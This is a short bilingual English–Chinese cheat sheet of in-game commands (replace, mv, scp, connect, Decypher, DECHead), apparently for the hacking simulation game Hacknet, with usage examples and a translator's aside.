replace [the file's name] "[target words]" "[your words]" - replace template.txt "[FIRST_NAME]" "John"

(If you use "cat" and open the file, you can use 'replace "[FIRST_NAME]" "John" ' instead. Use the full command above if you get "Assuming active flag file" error.)

Decypher [the file's name] [its password] - Decypher naix_secrets.dec D1CKS

DECHead [the file's name] - DECHead naix_private_photos.dec

mv [target's name] [new name] - mv template.txt Boorman_John[111]

scp (文件传输)[the file's name(文件名)] - scp index.html

connect(连接) [the IP address(IP地址)] - connect 103.33.8.643

cd (改变目录)[the folder path(文件地址)] - cd /log

replace(替换) [the file's name(文件名)] "[target words(文件中目标文字)]" "[your words(你想要替代它的文字)]" - replace template.txt "[FIRST_NAME]" "John"

[若您使用cat打开文件，你可以使用以下命令：“replace "[FIRST_NAME]" "John"”，若得到"Assuming active flag file"(译者：我对这句实在没辙……抱歉……)错误则打全整条命令。]

Decypher [the file's name(文件名)] [its password(其密码，有时没有)] - Decypher naix_secrets.dec D1CKS

mv(移动) [target's name(目标文件名)] [new name(新名)] - mv template.txt Boorman_John[111]

;wfr=spiderfor=pc